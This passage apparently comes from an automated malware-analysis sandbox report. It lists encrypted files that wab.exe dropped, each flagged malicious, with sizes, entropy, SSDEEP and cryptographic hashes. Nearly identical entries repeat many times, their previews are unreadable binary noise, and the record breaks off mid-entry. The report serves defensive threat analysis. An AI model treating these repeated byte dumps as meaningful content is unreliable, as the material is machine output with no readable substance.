                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):174160
                                                                                Entropy (8bit):7.999020795554231
                                                                                Encrypted:true
                                                                                SSDEEP:3072:qYkAxLdbGyY2ihg2KTO0ttUIJz7WVg4yGxODBr3FXXl0g3FtlT0RCF2rY:qYb1JPecOQErjwNFnl0A0gFj
                                                                                MD5:0842FF3F617DADEB82C911F1989134B9
                                                                                SHA1:44ADE0E77F69518CDF54EC095337C08CA9E70E73
                                                                                SHA-256:DC567B5F053E18579E66207FED8568543570114966ACB4BB1D535F9BCD4B3EB2
                                                                                SHA-512:782013F1B27C8A548995ABFECF24AC9CD48E19EEC972F0FC51A44546C8994053226EF22441DEAF9C062398E8CD08C9A22731F2A6DA7761628ABB3D9BA8D2619F
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):174160
                                                                                Entropy (8bit):7.999020795554231
                                                                                Encrypted:true
                                                                                SSDEEP:3072:qYkAxLdbGyY2ihg2KTO0ttUIJz7WVg4yGxODBr3FXXl0g3FtlT0RCF2rY:qYb1JPecOQErjwNFnl0A0gFj
                                                                                MD5:0842FF3F617DADEB82C911F1989134B9
                                                                                SHA1:44ADE0E77F69518CDF54EC095337C08CA9E70E73
                                                                                SHA-256:DC567B5F053E18579E66207FED8568543570114966ACB4BB1D535F9BCD4B3EB2
                                                                                SHA-512:782013F1B27C8A548995ABFECF24AC9CD48E19EEC972F0FC51A44546C8994053226EF22441DEAF9C062398E8CD08C9A22731F2A6DA7761628ABB3D9BA8D2619F
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
